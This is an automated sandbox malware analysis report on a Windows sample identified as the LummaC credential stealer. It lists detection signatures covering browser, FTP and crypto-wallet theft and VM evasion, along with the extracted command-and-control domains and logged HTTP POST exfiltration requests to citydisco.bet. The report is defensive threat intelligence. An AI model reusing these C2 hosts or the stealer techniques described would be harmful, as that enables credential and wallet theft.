Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SoftWare(1).exe

Overview

General Information

Sample name:SoftWare(1).exe
Analysis ID:1636833
MD5:82505c38e11c312f05b2891d330cf9c1
SHA1:232f8439df61af9b5ef164da0ea24120d866a93d
SHA256:36398113dbc31cc9ee99735f134cb246669c7f1f3932dba36628e24f12660246
Tags:exeLummaStealeruser-tcains1
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • SoftWare(1).exe (PID: 6464 cmdline: "C:\Users\user\Desktop\SoftWare(1).exe" MD5: 82505C38E11C312F05B2891D330CF9C1)
    • SoftWare(1).exe (PID: 6460 cmdline: "C:\Users\user\Desktop\SoftWare(1).exe" MD5: 82505C38E11C312F05B2891D330CF9C1)
  • cleanup
{"C2 url": ["citydisco.bet/gdJIS", "crosshairc.life/dAnjhw", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "ee729f4ae5f5061dbf683e54e422899b7064bfc1b83a48266d3e9929"}
SourceRuleDescriptionAuthorStrings
00000001.00000003.1242293904.0000000000537000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000001.00000003.1241714804.0000000000537000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000001.00000003.1271944869.0000000000537000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000001.00000003.1291734425.000000000056F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: SoftWare(1).exe PID: 6460JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-13T07:45:05.250063+010020283713Unknown Traffic192.168.2.449711188.114.97.3443TCP
            2025-03-13T07:45:07.922627+010020283713Unknown Traffic192.168.2.449712188.114.97.3443TCP
            2025-03-13T07:45:10.660431+010020283713Unknown Traffic192.168.2.449713188.114.97.3443TCP
            2025-03-13T07:45:13.392736+010020283713Unknown Traffic192.168.2.449716188.114.97.3443TCP
            2025-03-13T07:45:16.380875+010020283713Unknown Traffic192.168.2.449718188.114.97.3443TCP
            2025-03-13T07:45:19.456440+010020283713Unknown Traffic192.168.2.449720188.114.97.3443TCP
            2025-03-13T07:45:22.058422+010020283713Unknown Traffic192.168.2.449727188.114.97.3443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: SoftWare(1).exeAvira: detected
            Source: https://citydisco.bet:443/gdJISAvira URL Cloud: Label: malware
            Source: citydisco.bet/gdJISAvira URL Cloud: Label: malware
            Source: https://citydisco.bet/gdJISAvira URL Cloud: Label: malware
            Source: crosshairc.life/dAnjhwAvira URL Cloud: Label: malware
            Source: 00000000.00000002.1132624221.0000000000EB7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["citydisco.bet/gdJIS", "crosshairc.life/dAnjhw", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "ee729f4ae5f5061dbf683e54e422899b7064bfc1b83a48266d3e9929"}
            Source: SoftWare(1).exeVirustotal: Detection: 42%Perma Link
            Source: SoftWare(1).exeReversingLabs: Detection: 39%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 91.7% probability
            Source: 00000000.00000002.1132624221.0000000000EB7000.00000004.00000020.00020000.00000000.sdmpString decryptor: citydisco.bet/gdJIS
            Source: 00000000.00000002.1132624221.0000000000EB7000.00000004.00000020.00020000.00000000.sdmpString decryptor: crosshairc.life/dAnjhw
            Source: 00000000.00000002.1132624221.0000000000EB7000.00000004.00000020.00020000.00000000.sdmpString decryptor: mrodularmall.top/aNzS
            Source: 00000000.00000002.1132624221.0000000000EB7000.00000004.00000020.00020000.00000000.sdmpString decryptor: jowinjoinery.icu/bdWUa
            Source: 00000000.00000002.1132624221.0000000000EB7000.00000004.00000020.00020000.00000000.sdmpString decryptor: legenassedk.top/bdpWO
            Source: 00000000.00000002.1132624221.0000000000EB7000.00000004.00000020.00020000.00000000.sdmpString decryptor: htardwarehu.icu/Sbdsa
            Source: 00000000.00000002.1132624221.0000000000EB7000.00000004.00000020.00020000.00000000.sdmpString decryptor: cjlaspcorne.icu/DbIps
            Source: 00000000.00000002.1132624221.0000000000EB7000.00000004.00000020.00020000.00000000.sdmpString decryptor: bugildbett.top/bAuz
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0041C833 CryptUnprotectData,CryptUnprotectData,1_2_0041C833
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0041BCC0 CryptUnprotectData,1_2_0041BCC0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_0041C833 CryptUnprotectData,CryptUnprotectData,1_2_0041C833
            Source: SoftWare(1).exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49716 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49727 version: TLS 1.2
            Source: SoftWare(1).exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E38ECE FindFirstFileExW,0_2_00E38ECE
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00E38F7F FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00E38F7F
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E38ECE FindFirstFileExW,1_2_00E38ECE
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 1_2_00E38F7F FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00E38F7F
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+00000104h]1_2_0041C833
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 6D58C181h1_2_00421890
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-4926828Eh]1_2_00421890
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+04h]1_2_00413143
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CF91E6EAh1_2_0044A106
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then lea ecx, dword ptr [eax+eax]1_2_00412AF8
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then lea ecx, dword ptr [eax-40000000h]1_2_00412AF8
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then lea edx, dword ptr [ecx+ecx]1_2_00412AF8
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h1_2_0044C2A0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+44h]1_2_00444300
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi+3E8E80E8h]1_2_0044D300
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then mov word ptr [ecx], bx1_2_0044D300
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then cmp dword ptr [edi+edx*8], esi1_2_0044C3A0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-26h]1_2_0044C3A0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then mov ebp, ebx1_2_0044C3A0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx ecx, di1_2_0042FE40
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-1272D010h]1_2_0042FE40
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-26h]1_2_0044D7F0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+18h]1_2_0040EFAE
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then mov word ptr [edi], cx1_2_00429840
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx edx, byte ptr [00451018h]1_2_0040F066
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]1_2_00402800
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1ED597A4h1_2_004480C0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then mov word ptr [eax], cx1_2_00410897
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx]1_2_00410897
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-26h]1_2_0044D950
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0D0EF488h]1_2_0042D92B
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh1_2_004019E0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx edi, byte ptr [esp+edx-51AE6CD0h]1_2_0044AA55
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then mov dword ptr [esp], 8B8A8924h1_2_0043F250
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+19DCC0F6h]1_2_00445250
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx ebx, byte ptr [ebp+edi+00h]1_2_00445250
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then mov byte ptr [ecx], dl1_2_00423A70
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then mov byte ptr [edi], cl1_2_00423A70
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], C446A772h1_2_0041E21B
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-4926821Eh]1_2_0041E21B
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-4926821Eh]1_2_0041E21B
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 656D2358h1_2_0041E21B
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then jmp eax1_2_0041E21B
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+70h]1_2_0041E21B
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-49268212h]1_2_0041E21B
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx esi, byte ptr [eax]1_2_00448220
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h1_2_004292C0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6BB1A2B4h]1_2_004482E0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-000000FAh]1_2_00433A88
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then push eax1_2_00449B7F
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+00000104h]1_2_0041C833
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]1_2_0040A320
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]1_2_0040A320
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-000000FAh]1_2_00433A88
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+34h]1_2_00433330
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then mov byte ptr [esi], cl1_2_00436BE5
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+68h]1_2_00437BB8
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then mov byte ptr [ecx], dl1_2_00411C5F
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]1_2_00435C60
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then mov dword ptr [esp+08h], ebx1_2_00445C70
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then mov word ptr [eax], cx1_2_00410C1B
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx]1_2_00410C1B
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+5Ch]1_2_0042F430
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx ebx, byte ptr [edx]1_2_00441480
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+49408C66h]1_2_00428CB0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]1_2_0044BD46
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then mov byte ptr [eax], cl1_2_0041EDDC
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+6D3F2F7Eh]1_2_00420D90
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx edx, byte ptr [eax]1_2_00448590
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+50h]1_2_004305B2
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]1_2_0041AE40
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then mov byte ptr [edi], cl1_2_00438E42
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then mov dword ptr [esp+10h], ecx1_2_00438E42
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then add eax, esi1_2_00437627
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx edx, byte ptr [ebp+ecx+00h]1_2_0040CE30
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx ebx, byte ptr [eax+esi]1_2_0040CE30
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then mov dword ptr [esp+10h], ecx1_2_00438E39
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx ebp, byte ptr [esp+ecx+0Ah]1_2_00445ED1
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]1_2_00445ED1
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]1_2_004236EB
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then mov byte ptr [ebx], cl1_2_004386EC
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then mov word ptr [eax], cx1_2_00432F60
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx edi, byte ptr [esi+edx]1_2_00432F60
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then mov word ptr [eax], cx1_2_00432F60
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx esi, byte ptr [esp+eax]1_2_0041AF00
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-4926828Ah]1_2_0041AF00
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1A92C912h]1_2_0040C710
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-2Ah]1_2_0044C7D0
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+04h]1_2_00412FDB
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]1_2_00446790
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then mov byte ptr [eax], cl1_2_0041EFAD
            Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]1_2_00433FB0

            Networking

            barindex
            Source: Malware configuration extractorURLs: citydisco.bet/gdJIS
            Source: Malware configuration extractorURLs: crosshairc.life/dAnjhw
            Source: Malware configuration extractorURLs: mrodularmall.top/aNzS
            Source: Malware configuration extractorURLs: jowinjoinery.icu/bdWUa
            Source: Malware configuration extractorURLs: legenassedk.top/bdpWO
            Source: Malware configuration extractorURLs: htardwarehu.icu/Sbdsa
            Source: Malware configuration extractorURLs: cjlaspcorne.icu/DbIps
            Source: Malware configuration extractorURLs: bugildbett.top/bAuz
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49713 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49718 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49716 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49711 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49712 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49727 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49720 -> 188.114.97.3:443
            Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 97Host: citydisco.bet
            Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OEs7aqO56MrGfUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19610Host: citydisco.bet
            Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JaB2pwKrYBtAsUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8767Host: citydisco.bet
            Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=iCD1N6tejgNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20410Host: citydisco.bet
            Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AKrjJRRAxfjBYO8VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2235Host: citydisco.bet
            Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=70So3FLb1abh0oMzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1096Host: citydisco.bet
            Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 135Host: citydisco.bet
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: citydisco.bet
            Source: unknownHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 97Host: citydisco.bet
            Source: SoftWare(1).exe, 00000001.00000003.1211876234.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: SoftWare(1).exe, 00000001.00000003.1211876234.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: SoftWare(1).exe, 00000001.00000003.1211876234.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: SoftWare(1).exe, 00000001.00000003.1211876234.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: SoftWare(1).exe, 00000001.00000003.1211876234.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: SoftWare(1).exe, 00000001.00000003.1211876234.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: SoftWare(1).exe, 00000001.00000003.1211876234.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: SoftWare(1).exe, 00000001.00000003.1211876234.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: SoftWare(1).exe, 00000001.00000003.1211876234.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: SoftWare(1).exe, 00000001.00000003.1211876234.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: SoftWare(1).exe, 00000001.00000003.1211876234.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: SoftWare(1).exe, 00000001.00000003.1157929492.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
            Source: SoftWare(1).exe, 00000001.00000003.1157929492.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: SoftWare(1).exe, 00000001.00000003.1157929492.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: SoftWare(1).exe, 00000001.00000003.1157929492.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: SoftWare(1).exe, 00000001.00000002.1326354243.000000000057E000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1271713942.00000000005AA000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1317697438.000000000057C000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1291734425.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/
            Source: SoftWare(1).exe, 00000001.00000003.1317697438.000000000057C000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1184545093.00000000005A9000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1291734425.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJIS
            Source: SoftWare(1).exe, 00000001.00000002.1326354243.0000000000599000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1317697438.0000000000599000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJIS2
            Source: SoftWare(1).exe, 00000001.00000003.1158240596.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1184616624.00000000005BA000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1184598646.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1184545093.00000000005A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJISc1un
            Source: SoftWare(1).exe, 00000001.00000003.1242293904.0000000000537000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1241714804.0000000000537000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe, 00000001.00000003.1271944869.0000000000537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJISen
